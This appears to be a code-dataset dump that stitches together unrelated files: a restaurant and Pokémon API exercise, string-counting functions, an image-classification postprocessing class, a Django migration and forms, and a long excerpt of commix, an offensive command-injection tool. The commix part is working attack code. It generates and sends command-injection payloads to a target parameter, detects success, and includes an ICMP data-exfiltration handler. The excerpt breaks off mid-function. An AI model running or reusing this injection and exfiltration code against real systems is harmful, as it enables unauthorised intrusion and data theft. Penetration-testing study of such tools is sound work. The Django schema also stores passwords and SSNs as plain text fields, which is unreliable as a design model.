jumlah = int(input("How many restaurants do you want to show : ")) # Meminta jumlah restoran yang akan dikeluarkan
### Find City
urlkota = f'https://developers.zomato.com/api/v2.1/cities?q={kota}&count=1' # API Cities
webkota = requests.get(urlkota, headers = {'user-key': key})
output_kota = webkota.json()
# print (output)
cityid = output_kota['location_suggestions'][0]['id'] # Get entity_id of city
# print (cityid)
### Find Restaurant
urlresto = f'https://developers.zomato.com/api/v2.1/search?entity_id={cityid}&entity_type=city&count={jumlah}' #API Search
webresto = requests.get(urlresto, headers = {'user-key': key})
output_resto = webresto.json()
jumlah_resto = len(output_resto['restaurants'])
if jumlah <1:
print ('Invalid show number')
else:
for i in range(jumlah_resto):
print ('=' * 30)
print (f'Nama :{output_resto["restaurants"][i]["restaurant"]["name"]}') # Name
print (f'Establishment :{output_resto["restaurants"][i]["restaurant"]["establishment"][0]}') # Establishment
print (f'Cuisine :{output_resto["restaurants"][i]["restaurant"]["cuisines"]}') # Cuisine
print (f'Address :{output_resto["restaurants"][i]["restaurant"]["location"]["address"]}') # Address
print (f'Phone :{output_resto["restaurants"][i]["restaurant"]["phone_numbers"]}') # Phone
print (f'Rating :{output_resto["restaurants"][i]["restaurant"]["user_rating"]["aggregate_rating"]}/5.0') # Rating
print (f'Total Review :{output_resto["restaurants"][i]["restaurant"]["all_reviews_count"]}') # Total review
print ('=' * 30)
print ('')
break
except:
print("\nInvalid city name or show number\n")
break
elif menu == '2':
print ("====DAILY MENU====")
while True:
try:
kota = str(input("Please input a city name :")).lower() # Meminta nama kota
restaurant = str(input("Input a restaurant name : ")) # Meminta nama restoran yang akan dikeluarkan
jumlah = int(input('How many menu do you want to show : ')) #Meminta banyaknya menu yang akan ditampilkan
### Find City
urlkota = f'https://developers.zomato.com/api/v2.1/cities?q={kota}' # API Cities
webkota = requests.get(urlkota, headers = {'user-key': key})
output_kota = webkota.json()
# print (output)
cityid = output_kota['location_suggestions'][0]['id'] # Get entity_id of city
# print (cityid)
### Find a Restaurant
urlsearch = f'https://developers.zomato.com/api/v2.1/search?entity_id={cityid}&entity_type=city&q={restaurant}' #API Search
websearch = requests.get(urlsearch, headers = {'user-key': key})
output_search = websearch.json()
res_id = output_search['restaurants'][0]['restaurant']['id'] # Get Res_id of restaurant
# print (res_id)
### Find Daily Menu
urlmenu = f'https://developers.zomato.com/api/v2.1/dailymenu?res_id={res_id}&count={jumlah}'
webmenu = requests.get(urlmenu, headers = {'user-key': key})
output_menu = webmenu.json()
# print (output_menu)
no_menu = output_menu['message']
# print (no_menu)
jumlah_menu = len(output_menu['daily_menus'][0]['daily_menu']['dishes'])
if jumlah < 1:
print ('Invalid show number')
else:
if output_menu['status'] == 'success':
for i in range(jumlah):
print(f"Menu {i+1}")
print(f"Dish name: {output_menu['daily_menus'][0]['daily_menu']['dishes'][i]['dish']['name']}")
break
else:
print ("No Daily Menu Available")
break
except:
print("\nInvalid city name or restaurant name\n")
break
elif menu == '3':
print("====EXIT====")
break
else:
print ("\nApp is not avalaible\n")
'''
############################# Latihan - Tugas 2
Pokemon
pokeapi.co
Pokemon Database :
inputnya :
- Masukkan nama pokemon : (error handling)
outputnya :
- Nama Pokemon : ....
- HP : ....
- Attack : ....
- Deffense : ...
- Speed : ....
- Type : ....
- Image : url image foto pokemon
- Ability Name : ....
1.
2.
3.
'''
# ==================================================================================================
# import requests
# while True:
# try:
# pokemon = str(input("Input Pokemon name : ")).lower()
# url = f'https://pokeapi.co/api/v2/pokemon/{pokemon}'
# web = requests.get(url)
# output = web.json()
# if pokemon.isdigit() == True:
# print ('Number is not allowed')
# else:
# name = (output['name']).title() # Nama
# attack = output['stats'][1]['base_stat'] # Attack
# defense = output['stats'][2]['base_stat'] # Defense
# speed = output['stats'][5]['base_stat'] # Speed
# image = output['sprites']['back_default'] # Image
# tipe = output['types']
# types= []
# for i in range (len (output['types'])):
# types.append(tipe[i]['type']['name'])
# # print (types)
# types1 = ('-').join(types)
# tipe_tipe = types1 # Type
# abilities = output['abilities']
# ability= []
# for i in range (len (output['abilities'])):
# ability.append(abilities[i]['ability']['name'])
# # print (ability)
# ability1 = ('-').join(ability)
# abilities_abilities = ability1 # Abilities
# print(f'''===> POKEMON DATABASE <===
# Name : {name}
# Attack : {attack}
# Defense : {defense}
# Speed : {speed}
# Types : {tipe_tipe}
# Image : {image}
# Abilities : {abilities_abilities}''')
# break
# except:
# print ('''====Ivalid Pokemon name====
# Please input a valid pokemon name!''')
# =================================================================================================== |
993,531 | 0d1b8e9a0de12372e36ae011b91ac19ca917763d | import re
import itertools
import numpy as np
# Variant 1: pair each character with its successor via zip.
def count_doubles_zip(val):
    """Return how many characters in *val* equal the character right after them."""
    pairs = zip(val, val[1:])
    total = 0
    for left, right in pairs:
        total += left == right  # bool adds as 0/1
    return total
# Variant 2: explicit index walk, comparing each position with the previous one.
def count_doubles_classic(val):
    """Return the number of adjacent equal character pairs in *val*."""
    total = 0
    idx = 1
    while idx < len(val):
        if val[idx - 1] == val[idx]:
            total += 1
        idx += 1
    return total
# Variant 3: walk an iterator, remembering the previous character.
def count_doubles_iter(val):
    """Return the number of adjacent equal character pairs in *val*.

    Bug fix: the original wrote ``c1 == c2`` (a discarded comparison) instead of
    ``c1 = c2``, so the "previous" character was never advanced and the function
    actually counted how many later characters matched the *first* one.
    Also returns 0 for empty input instead of leaking StopIteration.
    """
    total = 0
    chars = iter(val)
    try:
        prev = next(chars)
    except StopIteration:
        return 0  # empty input has no pairs
    for cur in chars:
        if prev == cur:
            total += 1
        prev = cur  # advance the sliding window (was the no-op `c1 == c2`)
    return total
# Variant 4: duplicate the iterable with itertools.tee and offset one copy.
def count_doubles_itertools(val):
    """Return the number of adjacent equal character pairs in *val*."""
    first, second = itertools.tee(val)
    next(second, None)  # shift the second stream one position ahead
    return sum(a == b for a, b in zip(first, second))
# Variant 5: zero-width lookahead, so overlapping doubles ("aaa" -> 2) all match.
double_re = re.compile(r'(?=(.)\1)')
def count_doubles_regexp(val):
    """Return the number of adjacent equal character pairs in *val*."""
    return sum(1 for _ in double_re.finditer(val))
# Variant 6: compare the byte array against a one-position shift of itself.
# NOTE(review): operates on UTF-8 bytes, so multi-byte characters may count
# differently than the character-based variants — presumably ASCII input.
def count_doubles_numpy(val):
    """Return the number of adjacent equal byte pairs in *val*."""
    codes = np.frombuffer(val.encode('utf-8'), dtype=np.byte)
    return np.sum(codes[1:] == codes[:-1])
# Variant 7: single generator expression over the index range.
def count_doubles_comprehension(val):
    """Return the number of adjacent equal character pairs in *val*."""
    return sum(1 for pos in range(1, len(val)) if val[pos] == val[pos - 1])
|
993,532 | 5dc2d487b6128e06ab9b58f79899014c8427b5ae | '''
Created on 12/12/2018
Modified on 26/02/2018
@author: Francesco Pugliese
'''
import pdb
class Postprocessing:
    """Helpers that turn classifier label indices into class names, per-class
    counts, and pie-chart statistics for the EuroSAT and LUCAS taxonomies.

    The original if/elif ladders are replaced with index-aligned lookup tables;
    behavior is unchanged except that:
      * an out-of-range label now raises IndexError instead of silently reusing
        the previous label (or raising UnboundLocalError on the first tile);
      * the misspelled class name 'Aritificial Land' is fixed to
        'Artificial Land';
      * the EuroSAT ground-truth title string had a missing backslash
        ("...Classification n\\n...") which is fixed to a real blank line.
    """

    # Index -> English EuroSAT class name.
    _EUROSAT_CLASSES_EN = ['Annual Crop', 'Forest', 'Herbaceous Vegetation',
                           'Highway', 'Industrial', 'Pasture', 'Permanent Crop',
                           'Residential', 'River', 'Sea Lake']

    # Index -> Italian EuroSAT class name (used in the per-tile output).
    _EUROSAT_CLASSES_IT = ['raccolto annuale', 'foresta', 'vegetazione erbacea',
                           'strada', 'industriale', 'pascolo',
                           'coltura permanente', 'residenziale', 'fiume', 'lago']

    # EuroSAT pie-chart entries: (printed name, chart label, wedge color),
    # index-aligned with the countings list from eurosat_labels_counting.
    _EUROSAT_STATS = [('raccolto annuale', 'raccolto annuale', 'khaki'),
                      ('foresta', 'foresta', 'green'),
                      ('vegetazione erbacea', 'veg. erbacea', 'yellowgreen'),
                      ('strada', 'strada', 'grey'),
                      ('industriale', 'industriale', 'peru'),
                      ('pascolo', 'pascolo', 'whitesmoke'),
                      ('coltura permanente', 'coltura permanente', 'mediumseagreen'),
                      ('residenziale', 'residenziale', 'beige'),
                      ('fiume', 'fiume', 'aqua'),
                      ('lago', 'lago', 'cyan')]

    # LUCAS: the ten raw label indices collapse onto five macro classes.
    # Index -> (class name, slot in the 5-element countings list).
    _LUCAS_CLASSES = [('Crop Land', 0),
                      ('Wood Land', 1),
                      ('Grass Land', 2),
                      ('Artificial Land', 3),
                      ('Artificial Land', 3),   # was misspelled 'Aritificial Land'
                      ('Crop Land', 0),
                      ('Crop Land', 0),
                      ('Artificial Land', 3),
                      ('Water Areas', 4),
                      ('Water Areas', 4)]

    # LUCAS pie-chart entries: (name, wedge color), aligned with the 5 slots.
    _LUCAS_STATS = [('Cropland', 'khaki'),
                    ('Woodland', 'green'),
                    ('Grassland', 'yellowgreen'),
                    ('Artificial Land', 'grey'),
                    ('Water Areas', 'aqua')]

    @staticmethod
    def labels_to_eurosat_classes_converter(class_number):
        """Return the English EuroSAT class name for a label index in 0..9.

        Raises IndexError for out-of-range indices (the original chain raised
        UnboundLocalError instead)."""
        return Postprocessing._EUROSAT_CLASSES_EN[class_number]

    @staticmethod
    def eurosat_labels_counting(coords_list, classes_list, language):
        """Attach the Italian EuroSAT class name to every tile and count classes.

        Each element of classes_list is a one-element list such as ``[3]``;
        coords_list[i] holds the tile's bounding box. Returns
        ``[classes_array_list, countings]`` where countings is a 10-element
        list in class-index order. ``language`` is accepted for interface
        compatibility but currently unused."""
        classes_array_list = []
        countings = [0] * 10
        for i in range(len(classes_list)):
            idx = classes_list[i][0]
            class_txt = Postprocessing._EUROSAT_CLASSES_IT[idx]
            countings[idx] += 1
            coords = coords_list[i]
            # Note the coordinate order: stored as [x0, x1, y0, y1, name],
            # mirroring the original output format.
            classes_array_list.append([coords[0], coords[2], coords[1], coords[3], class_txt])
        return [classes_array_list, countings]

    @staticmethod
    def lucas_labels_counting(coords_list, classes_list, language):
        """Attach the LUCAS macro-class name to every tile and count classes.

        Returns ``[classes_array_list, countings]`` where countings is
        ``[crop_land, wood_land, grass_land, artificial_land, water_areas]``.
        ``language`` is accepted for interface compatibility but unused."""
        classes_array_list = []
        countings = [0] * 5
        for i in range(len(classes_list)):
            idx = classes_list[i][0]
            class_txt, slot = Postprocessing._LUCAS_CLASSES[idx]
            countings[slot] += 1
            coords = coords_list[i]
            classes_array_list.append([coords[0], coords[2], coords[1], coords[3], class_txt])
        return [classes_array_list, countings]

    @staticmethod
    def eurosat_statistics_compute(countings, coords_list, language):
        """Build pie-chart inputs (fractions, labels, explode offsets, colors)
        for the non-empty EuroSAT classes, printing each percentage."""
        fracs = []
        labels = []
        explode = []
        colors = []
        total = len(coords_list)
        for count, (printed, label, color) in zip(countings, Postprocessing._EUROSAT_STATS):
            if count != 0:
                frac = (count / total) * 100
                print(printed + ':', frac, '%')
                fracs.append(frac)
                labels.append(label)
                explode.append(0.1)
                colors.append(color)
        return [fracs, labels, explode, colors]

    @staticmethod
    def lucas_statistics_compute(countings, coords_list, language):
        """Build pie-chart inputs for the non-empty LUCAS macro classes,
        printing each percentage."""
        fracs = []
        labels = []
        explode = []
        colors = []
        total = len(coords_list)
        for count, (name, color) in zip(countings, Postprocessing._LUCAS_STATS):
            if count != 0:
                frac = (count / total) * 100
                print(name + ':', frac, '%')
                fracs.append(frac)
                labels.append(name)
                explode.append(0.1)
                colors.append(color)
        return [fracs, labels, explode, colors]

    @staticmethod
    def get_plot_classes_title(parameters):
        """Return ``[classes_title, ground_truth_title, quantization_title]``
        for the plots, based on the run configuration in *parameters*."""
        if parameters.classification_type == "EuroSAT":
            classes_title = "EuroSat Classification \n\n"
            # Fixed: original read "EuroSAT Classification n\n ..." (lost backslash).
            ground_truth_title = "EuroSAT Classification \n\n Ground Truth"
        elif parameters.classification_type == "Lucas":
            classes_title = "Lucas Classification \n\n"
            ground_truth_title = "Lucas Classification \n\n Ground Truth"
        # Quantization title derives from the bare title, before stride/rotation
        # details are appended (order preserved from the original).
        if parameters.quantization == True:
            quantization_title = classes_title + "Quantification by different samplings"
        else:
            quantization_title = None
        if parameters.rotate_tiles == True:
            rotation = "On"
        else:
            rotation = "Off"
        classes_title = classes_title + " Stride: " + str(parameters.stride) + ", Rotation: " + rotation
        if parameters.rotate_tiles == True:
            classes_title = classes_title + ", Rotation type: "
            if parameters.random_rotations == True:
                classes_title = classes_title + "Random"
            else:
                classes_title = classes_title + "180"
        return [classes_title, ground_truth_title, quantization_title]
|
993,533 | 175c562a819b3fbee1727f3da1d012775992659d | /home/mi/besahre/Documents/Bachelorarbeit/Modelcar-111/catkin_ws_user/devel/.private/line_detection_fu/lib/python2.7/dist-packages/line_detection_fu/__init__.py |
993,534 | 84c930b962e2548d9a975609c250c17bc835d3d6 | # Generated by Django 2.0.3 on 2018-03-25 02:17
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the `tables` app: customers, employees (chefs and
    delivery staff), restaurants, menus, orders, checkout items, and the
    feedback tables (reviews, complaints, compliments).

    Auto-generated by Django 2.0.3 (`makemigrations`). Do not hand-edit the
    operations of a migration that may already have been applied.
    """

    # First migration of this app: no prior migration state exists.
    initial = True

    dependencies = [
    ]

    operations = [
        # Shopping-cart line items; linked to a customer via AddField below.
        migrations.CreateModel(
            name='checkout',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('item', models.CharField(max_length=50)),
                ('total', models.DecimalField(decimal_places=2, max_digits=5)),
            ],
        ),
        # Chef role record; tied to an employee and a restaurant via AddField.
        migrations.CreateModel(
            name='chef',
            fields=[
                ('chef_id', models.AutoField(primary_key=True, serialize=False)),
                ('menu_name', models.CharField(max_length=10)),
                ('warning', models.IntegerField()),
            ],
        ),
        # Customer complaints about employees; `approval` marks moderation state.
        migrations.CreateModel(
            name='complaints',
            fields=[
                ('comp_id', models.AutoField(primary_key=True, serialize=False)),
                ('complaint_text', models.CharField(max_length=1000)),
                ('approval', models.BooleanField()),
            ],
        ),
        # Customer compliments about employees; mirrors `complaints`.
        migrations.CreateModel(
            name='compliments',
            fields=[
                ('comp_id', models.AutoField(primary_key=True, serialize=False)),
                ('compliment_text', models.CharField(max_length=1000)),
                ('approval', models.BooleanField()),
            ],
        ),
        # Customer account, with loyalty/VIP bookkeeping fields.
        migrations.CreateModel(
            name='customer',
            fields=[
                ('user_id', models.CharField(max_length=60, primary_key=True, serialize=False)),
                ('password', models.CharField(max_length=25)),
                ('user_fname', models.CharField(max_length=25)),
                ('user_lname', models.CharField(max_length=25)),
                ('address', models.CharField(max_length=30)),
                ('city', models.CharField(max_length=10)),
                ('state', models.CharField(max_length=5)),
                ('zipcode', models.CharField(max_length=5)),
                ('phone', models.CharField(max_length=10)),
                ('birthday', models.DateField()),
                ('memb_since', models.DateTimeField()),
                ('wallet', models.DecimalField(decimal_places=2, max_digits=5)),
                ('VIP', models.BooleanField()),
                ('warning', models.IntegerField()),
                ('order_count', models.IntegerField()),
                ('num_complaints', models.IntegerField()),
                ('last_order', models.DateTimeField()),
            ],
        ),
        # Customer-authored ratings of an order (pizza / store / delivery).
        migrations.CreateModel(
            name='customer_review',
            fields=[
                ('review_id', models.AutoField(primary_key=True, serialize=False)),
                ('pizza_rating', models.IntegerField()),
                ('store_rating', models.IntegerField()),
                ('delivery_rating', models.IntegerField()),
            ],
        ),
        # Delivery-person role record; tied to employee/restaurant via AddField.
        migrations.CreateModel(
            name='delivery',
            fields=[
                ('deliver_id', models.AutoField(primary_key=True, serialize=False)),
                ('status', models.BooleanField()),
                ('warning', models.IntegerField()),
            ],
        ),
        # Delivery person's review of a customer.
        migrations.CreateModel(
            name='delivery_review',
            fields=[
                ('review_id', models.AutoField(primary_key=True, serialize=False)),
                ('customer_rating', models.CharField(max_length=100)),
            ],
        ),
        # Employee account (shared by chefs and delivery staff).
        migrations.CreateModel(
            name='employees',
            fields=[
                ('emp_id', models.AutoField(primary_key=True, serialize=False)),
                ('password', models.CharField(max_length=25)),
                ('emp_fname', models.CharField(max_length=25)),
                ('emp_lname', models.CharField(max_length=25)),
                ('address', models.CharField(max_length=30)),
                ('city', models.CharField(max_length=10)),
                ('state', models.CharField(max_length=5)),
                ('zipcode', models.CharField(max_length=5)),
                ('phone', models.CharField(max_length=10)),
                ('ssn', models.CharField(max_length=9)),
                ('birthday', models.DateField()),
                ('salary', models.DecimalField(decimal_places=2, max_digits=5)),
                ('date_hired', models.DateTimeField()),
                ('num_compliment', models.IntegerField()),
                ('num_complaint', models.IntegerField()),
                ('last_order', models.DateTimeField()),
            ],
        ),
        # Menu item, owned by a chef (FK declared inline here).
        migrations.CreateModel(
            name='menu',
            fields=[
                ('menu_id', models.AutoField(primary_key=True, serialize=False)),
                ('price', models.DecimalField(decimal_places=2, max_digits=5)),
                ('description', models.CharField(max_length=100)),
                ('rating', models.IntegerField()),
                ('picture', models.CharField(max_length=1000)),
                ('chef_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.chef')),
            ],
        ),
        # Order of a menu item; restaurant FK added below.
        migrations.CreateModel(
            name='order',
            fields=[
                ('order_id', models.AutoField(primary_key=True, serialize=False)),
                ('total', models.IntegerField()),
                ('menu_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.menu')),
            ],
        ),
        # Restaurant/store location.
        migrations.CreateModel(
            name='restaurant',
            fields=[
                ('rest_id', models.AutoField(primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=40)),
                ('address', models.CharField(max_length=30)),
                ('city', models.CharField(max_length=10)),
                ('state', models.CharField(max_length=5)),
                ('zipcode', models.CharField(max_length=5)),
                ('phone', models.CharField(max_length=10)),
            ],
        ),
        # Remaining foreign keys are added after all models exist, so the
        # autodetector's creation order above does not need forward references.
        migrations.AddField(
            model_name='order',
            name='rest_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.restaurant'),
        ),
        migrations.AddField(
            model_name='delivery_review',
            name='emp_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.employees'),
        ),
        migrations.AddField(
            model_name='delivery_review',
            name='user_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.customer'),
        ),
        migrations.AddField(
            model_name='delivery',
            name='emp_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.employees'),
        ),
        migrations.AddField(
            model_name='delivery',
            name='store',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.restaurant'),
        ),
        migrations.AddField(
            model_name='customer_review',
            name='emp_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.employees'),
        ),
        migrations.AddField(
            model_name='customer_review',
            name='order_number',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.order'),
        ),
        migrations.AddField(
            model_name='customer_review',
            name='user_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.customer'),
        ),
        migrations.AddField(
            model_name='compliments',
            name='emp_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.employees'),
        ),
        migrations.AddField(
            model_name='compliments',
            name='user_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.customer'),
        ),
        migrations.AddField(
            model_name='complaints',
            name='emp_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.employees'),
        ),
        migrations.AddField(
            model_name='complaints',
            name='user_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.customer'),
        ),
        migrations.AddField(
            model_name='chef',
            name='emp_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.employees'),
        ),
        migrations.AddField(
            model_name='chef',
            name='store',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.restaurant'),
        ),
        migrations.AddField(
            model_name='checkout',
            name='user_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.customer'),
        ),
    ]
|
993,535 | 151b22c171895f2b4c0700b57a174f9ee95337b3 | from .models import BookingDate, BookingWorkplace
from django.forms import ModelForm, DateInput, Select, DateField, IntegerField, Form, ChoiceField, SelectDateWidget
from .data import default_choices
from django.contrib.admin.widgets import AdminDateWidget
from django.forms.widgets import NumberInput
from bootstrap_datepicker_plus import DatePickerInput
class BookingDateForm(ModelForm):
    """Model form for choosing the date of a BookingDate record."""
    class Meta:
        model = BookingDate
        fields = ['booking_date']
        widgets = {
            # Render the date as three <select> elements (day/month/year).
            'booking_date' : SelectDateWidget()
        }
class BookingTimeForm(ModelForm):
    """Model form for picking a start/end time of a workplace booking.

    The available time slots are computed by the caller and injected through
    the ``start_choices`` / ``end_choices`` constructor kwargs.
    """
    def __init__(self, *args, **kwargs):
        # Dynamic choice lists for the two <select> fields.
        start_choices = kwargs.pop('start_choices')
        end_choices = kwargs.pop('end_choices')
        # NOTE(review): the next four kwargs are popped so they do not reach
        # ModelForm.__init__, but their values are never used in this class —
        # confirm whether callers still need to pass them.
        cabinet = kwargs.pop('cabinet')
        workplace = kwargs.pop('workplace')
        booking_date = kwargs.pop('booking_date')
        user = kwargs.pop('user')
        super(BookingTimeForm, self).__init__(*args, **kwargs)
        # Install the caller-computed choices on the bound form fields.
        self.fields['start_time'].choices = start_choices
        self.fields['end_time'].choices = end_choices
    class Meta:
        model = BookingWorkplace
        fields = ['start_time', 'end_time']
        widgets = {
            # Bootstrap-styled <select> widgets for both time fields.
            'start_time' : Select(attrs={
                'class' : 'form-select',
                'aria-label' : "Default select example",
            }),
            'end_time' : Select(attrs={
                'class' : 'form-select',
                'aria-label' : "Default select example",
            }),
        }
class FreeWorkplaceForm(Form):
    """Search form for free workplaces over a date and a working-time interval.

    Fix: this is a plain ``forms.Form`` (not a ``ModelForm``), and Django
    ignores an inner ``Meta`` class on plain forms — the widget customization
    previously declared in ``Meta.widgets`` never took effect. The widgets are
    now attached directly to the field declarations, which is the supported
    mechanism for ``Form`` subclasses.
    """
    # Date rendered as three <select> elements (day/month/year).
    booking_date = DateField(label='Дата', widget=SelectDateWidget())
    # Interval boundaries; choices come from the shared defaults table.
    start_time = ChoiceField(
        label='Начало работы',
        choices=default_choices,
        # NOTE(review): 'verbose_name' is not a standard HTML attribute and is
        # emitted verbatim on the <select> tag; kept from the original config —
        # confirm it is intentional.
        widget=Select(attrs={'class': 'form-control', 'verbose_name': 'Начало'}),
    )
    end_time = ChoiceField(
        label='Конец работы',
        choices=default_choices,
        widget=Select(attrs={'class': 'form-control'}),
    )
|
993,536 | 224b7a21fce7b3cd1e13fbea019afb16a0774460 | #!/usr/bin/env python
# encoding: UTF-8
"""
This file is part of commix (@commixproject) tool.
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst).
https://github.com/stasinopoulos/commix
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation,either version 3 of the License,or
(at your option) any later version.
For more see the file 'readme/COPYING' for copying permission.
"""
import re
import os
import sys
import time
import string
import random
import base64
import urllib
import urllib2
from src.utils import menu
from src.utils import colors
from src.utils import settings
from src.core.requests import headers
from src.core.requests import parameters
from src.core.injections.results_based.techniques.classic import cb_injector
from src.core.injections.results_based.techniques.classic import cb_payloads
from src.core.injections.results_based.techniques.classic import cb_enumeration
"""
The "classic" technique on Result-based OS Command Injection.
"""
#-------------------------------------------------------
# The "icmp exfiltration" injection technique handler.
#-------------------------------------------------------
def icmp_exfiltration_handler(url,http_request_method):
  """Run the ICMP-exfiltration technique.

  Parses the vulnerable parameter from the URL (GET) or POST data, extracts
  the source/destination IPs from the --ip-icmp-data option string, and hands
  exploitation over to the ICMP_Exfiltration module. Requires root (raw
  sockets). Exits the process on missing privileges or import failure.
  """
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print colors.BGRED + "\n(x) Error: You need to have root privileges to run this option.\n" + colors.RESET
    sys.exit(0)

  if http_request_method == "GET":
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)

    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    request_data = vuln_parameter

  else:
    # POST: the injectable parameter lives in the request body (--data).
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)

    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)

    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter,url)
    request_data = vuln_parameter

  ip_data = menu.options.ip_icmp_data

  # Load the module ICMP_Exfiltration
  try:
    from src.core.modules import ICMP_Exfiltration
  except ImportError as e:
    print colors.BGRED + "(x) Error:",e
    print colors.RESET
    sys.exit(1)

  technique = "ICMP exfiltration technique"
  sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... \n" + colors.RESET)
  sys.stdout.flush()

  # --ip-icmp-data looks like "ip_src=<addr>,ip_dst=<addr>"; pull both out.
  ip_src = re.findall(r"ip_src=(.*),",ip_data)
  ip_src = ''.join(ip_src)

  ip_dst = re.findall(r"ip_dst=(.*)",ip_data)
  ip_dst = ''.join(ip_dst)

  ICMP_Exfiltration.exploitation(ip_dst,ip_src,url,http_request_method,request_data)
#---------------------------------------------
# The "classic" injection technique handler.
#---------------------------------------------
def cb_injection_handler(url,delay,filename,http_request_method):
  """Probe the target for results-based ("classic") command injection.

  Iterates over every combination of whitespace, prefix, suffix and command
  separator from settings, sends a decision payload carrying a random TAG,
  and checks whether the TAG is reflected in the response. On success it logs
  the finding to <filename>.txt, optionally runs the enumeration checks, and
  offers an interactive pseudo-terminal. Returns False when no combination
  worked; returns None after a successful (interactive) run.
  """
  counter = 0
  vp_flag = True
  no_result = True
  is_encoded= False
  injection_type = "Results-based Command Injection"
  technique = "classic injection technique"

  sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... " + colors.RESET)
  sys.stdout.flush()

  # Print the findings to log file.
  output_file = open(filename + ".txt","a")
  output_file.write("\n---")
  output_file.write("\n(+) Type : " + injection_type)
  output_file.write("\n(+) Technique : " + technique.title())
  output_file.close()

  # Exhaustive search over the payload-shape space.
  for whitespace in settings.WHITESPACES:
    for prefix in settings.PREFIXES:
      for suffix in settings.SUFFIXES:
        for separator in settings.SEPARATORS:

          # Check for bad combination of prefix and separator
          combination = prefix + separator
          if combination in settings.JUNK_COMBINATION:
            prefix = ""

          # Change TAG on every request to prevent false-positive resutls.
          TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))

          # Check if defined "--base64" option.
          if menu.options.base64_trick == True:
            B64_ENC_TAG = base64.b64encode(TAG)
            B64_DEC_TRICK = settings.B64_DEC_TRICK
          else:
            B64_ENC_TAG = TAG
            B64_DEC_TRICK = ""

          try:
            # Classic decision payload (check if host is vulnerable).
            payload = cb_payloads.decision(separator,TAG,B64_ENC_TAG,B64_DEC_TRICK)

            # Check if defined "--prefix" option.
            if menu.options.prefix:
              prefix = menu.options.prefix
              payload = prefix + payload
            else:
              payload = prefix + payload

            # Check if defined "--suffix" option.
            if menu.options.suffix:
              suffix = menu.options.suffix
              payload = payload + suffix
            else:
              payload = payload + suffix

            # URL-encode spaces, or substitute the candidate whitespace.
            if separator == " " :
              payload = re.sub(" ","%20",payload)
            else:
              payload = re.sub(" ",whitespace,payload)

            # Check if defined "--verbose" option.
            if menu.options.verbose:
              sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)

            # Check if target host is vulnerable.
            response,vuln_parameter = cb_injector.injection_test(payload,http_request_method,url)

            # if need page reload
            if menu.options.url_reload:
              time.sleep(delay)
              response = urllib.urlopen(url)

            # Evaluate test results.
            shell = cb_injector.injection_test_results(response,TAG)

          except:
            # Any request/parse failure just moves on to the next combination.
            continue

          # Yaw, got shellz!
          # Do some magic tricks!
          if shell:
            found = True
            no_result = False

            if http_request_method == "GET":
              # Print the findings to log file
              if vp_flag == True:
                output_file = open(filename + ".txt","a")
                output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
                output_file.write("\n---\n")
                vp_flag = False
                output_file.close()

              counter = counter + 1
              output_file = open(filename + ".txt","a")
              output_file.write("  ("+str(counter)+") Payload : "+ re.sub("%20"," ",payload) + "\n")
              output_file.close()

              # Print the findings to terminal.
              print colors.BOLD + "\n(!) The ("+ http_request_method + ") '" + vuln_parameter +"' parameter is vulnerable to "+ injection_type +"."+ colors.RESET
              print "  (+) Type : "+ colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
              print "  (+) Technique : "+ colors.YELLOW + colors.BOLD + technique.title() + colors.RESET + ""
              print "  (+) Parameter : "+ colors.YELLOW + colors.BOLD + vuln_parameter + colors.RESET + ""
              print "  (+) Payload : "+ colors.YELLOW + colors.BOLD + re.sub("%20"," ",payload) + colors.RESET

            else :
              # Print the findings to log file
              if vp_flag == True:
                output_file = open(filename + ".txt","a")
                output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
                output_file.write("\n---\n")
                vp_flag = False
                output_file.close()

              counter = counter + 1
              output_file = open(filename + ".txt","a")
              output_file.write("  ("+str(counter)+") Payload : "+ re.sub("%20"," ",payload) + "\n")
              output_file.close()

              # Print the findings to terminal.
              print colors.BOLD + "\n(!) The ("+ http_request_method + ") '" + vuln_parameter +"' parameter is vulnerable to "+ injection_type +"."+ colors.RESET
              print "  (+) Type : "+ colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
              print "  (+) Technique : "+ colors.YELLOW + colors.BOLD + technique.title() + colors.RESET + ""
